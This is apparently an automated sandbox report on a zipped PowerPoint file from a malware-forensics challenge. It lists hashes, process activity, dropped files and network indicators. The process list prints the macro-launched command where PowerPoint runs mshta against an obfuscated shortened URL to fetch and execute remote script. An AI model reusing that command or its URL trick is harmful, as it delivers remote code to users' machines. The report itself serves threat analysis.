analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

RETO-MALWAREDFIR.zip

Full analysis: https://app.any.run/tasks/4167bbc4-9087-442f-86ea-479f91f40dbe
Verdict: Malicious activity
Analysis date: June 18, 2024, 13:28:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

A333AD0029F525E21B07936689F0371D

SHA1:

6B5A01983F0FDFD5B3CB830D40EAB21B0B0BA09B

SHA256:

ACB38A830AA748810AD57280F49F19ADE5D2B81981E742940C37F54A25A97E04

SSDEEP:

768:tHv53y1GR0vK/u7L5ApmKGOBsDjwBJdbVziNe73/tiNelv0SXixkHg:l5yIRJoCWDjwRYe7PtiNysxkA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from MS Office

      • POWERPNT.EXE (PID: 3416)

  • SUSPICIOUS

    • Reads the Internet Settings

      • mshta.exe (PID: 2248)

    • Runs shell command (SCRIPT)

      • POWERPNT.EXE (PID: 3416)

  • INFO

    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 3260)

    • Checks proxy server information

      • mshta.exe (PID: 2248)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 2248)

    • Manual execution by a user

      • wmpnscfg.exe (PID: 596)

    • Reads the computer name

      • wmpnscfg.exe (PID: 596)

    • Checks supported languages

      • wmpnscfg.exe (PID: 596)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: RETO-MALWAREDFIR.ppt
ZipUncompressedSize: 136192
ZipCompressedSize: 44473
ZipCRC: 0x0232f3bb
ZipModifyDate: 2024:02:16 19:03:46
ZipCompression: Deflated
ZipBitFlag: 0x0001
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
6
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs powerpnt.exe no specs mshta.exe ping.exe no specs winword.exe no specs wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3260"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\RETO-MALWAREDFIR.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3416"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\AppData\Local\Temp\Rar$DIb3260.11909\RETO-MALWAREDFIR.ppt"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft PowerPoint
Exit code:
0
Version:
14.0.6009.1000
Modules
Images
c:\program files\microsoft office\office14\powerpnt.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\ppcore.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2248mSHtA http://12384928198391823%[email protected]/hdkjashdkasbctdgjsaC:\Windows\System32\mshta.exe
POWERPNT.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2936pingC:\Windows\System32\PING.EXEPOWERPNT.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
540winwordC:\Program Files\Microsoft Office\Office14\WINWORD.EXEPOWERPNT.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
596"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
20 125
Read events
19 272
Write events
622
Delete events
231

Modification events

(PID) Process:(3260) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3260) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3260) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3260) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3260) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3260) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(3260) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\RETO-MALWAREDFIR.zip
(PID) Process:(3260) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3260) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3260) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
0
Suspicious files
10
Text files
3
Unknown types
2

Dropped files

PID
Process
Filename
Type
3416POWERPNT.EXEC:\Users\admin\AppData\Local\Temp\CVR22A.tmp.cvr
MD5:
SHA256:
540WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR1312.tmp.cvr
MD5:
SHA256:
2248mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894der
MD5:E38554F956459BAABCF311C568DEFD6E
SHA256:5204C5678485962D058D97B2AA520B452A3F9CBE030DB41D80C057A1A1C3E143
2248mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894binary
MD5:C1071F4C1BF8A2A956387ECDDA101373
SHA256:4D4247AA1897ED9634454C619C236CE66F507683D2AF2AEBD74B279AC7033514
540WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:3362C6398DB5583A37E3567DD874A5D9
SHA256:31DD27C9A990922944077CC57C78CD6EB960FD8600BE011408EE2978C9694341
3416POWERPNT.EXEC:\Users\admin\AppData\Local\Temp\~DF182D070E184E6945.TMPbinary
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
540WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{820DB3AA-4582-4133-85A9-925D23E43A43}.tmpbinary
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
2248mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_B5D3A17E5BEDD2EDA793611A0A74E1E8binary
MD5:51E5569C159FC5843470E454D5D5FDED
SHA256:E8383A5D616F8EA016CF01C51AD78586C56632C21814F161DA42C4B3EE64B14E
2248mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62binary
MD5:4895022C2F579A75EA5B2079FF1C7BE1
SHA256:F1F4C6A2A05D585585C0F830A3B75C4090A6C3E9E3C6D637E563497E5CAF5C70
540WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{691CA541-F265-49A6-9518-B94DAB7808BB}.tmpbinary
MD5:0D18646E0D178B416758DE7E88A6C22E
SHA256:19D001B8A923DE77F8A017933EF47BB5C9680442A3867864E1E6E021AA96E9DF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
17
DNS requests
12
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2248
mshta.exe
GET
304
104.110.240.224:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?652616f94dd9f09c
unknown
unknown
2248
mshta.exe
GET
304
104.110.240.209:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6ccba692cfd50a33
unknown
unknown
2248
mshta.exe
GET
200
18.245.39.64:80
http://ocsp.rootg2.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D
unknown
unknown
1372
svchost.exe
GET
200
92.123.77.26:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
2248
mshta.exe
GET
200
108.138.2.173:80
http://o.ss2.us//MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D
unknown
unknown
2248
mshta.exe
GET
200
18.245.39.64:80
http://ocsp.rootca1.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwdzEjgLnWaIozse2b%2BczaaODg8%3D
unknown
unknown
2248
mshta.exe
GET
200
67.199.248.17:80
http://j.mp/hdkjashdkasbctdgjsa
unknown
unknown
1372
svchost.exe
GET
200
23.34.165.217:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
1060
svchost.exe
GET
304
92.123.77.25:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?60bcd71e49d094b3
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1060
svchost.exe
224.0.0.252:5355
unknown
1372
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2248
mshta.exe
67.199.248.17:80
j.mp
GOOGLE-CLOUD-PLATFORM
US
shared
2248
mshta.exe
13.33.158.18:443
d1ayxb9ooonjts.cloudfront.net
US
unknown
2248
mshta.exe
104.110.240.224:80
ctldl.windowsupdate.com
Akamai International B.V.
NL
unknown
2248
mshta.exe
104.110.240.209:80
ctldl.windowsupdate.com
Akamai International B.V.
NL
unknown
2248
mshta.exe
108.138.2.173:80
o.ss2.us
AMAZON-02
US
unknown
2248
mshta.exe
18.245.39.64:80
ocsp.rootg2.amazontrust.com
US
unknown

DNS requests

Domain
IP
Reputation
j.mp
  • 67.199.248.17
  • 67.199.248.16
unknown
d1ayxb9ooonjts.cloudfront.net
  • 13.33.158.18
  • 13.33.158.128
  • 13.33.158.108
  • 13.33.158.220
whitelisted
ctldl.windowsupdate.com
  • 104.110.240.209
  • 104.110.240.224
  • 92.123.77.25
  • 92.123.77.35
whitelisted
o.ss2.us
  • 108.138.2.173
  • 108.138.2.107
  • 108.138.2.10
  • 108.138.2.195
whitelisted
ocsp.rootg2.amazontrust.com
  • 18.245.39.64
whitelisted
ocsp.rootca1.amazontrust.com
  • 18.245.39.64
shared
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 92.123.77.26
  • 2.19.194.200
whitelisted
www.microsoft.com
  • 23.34.165.217
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
RETO-MALWAREDFIR.zip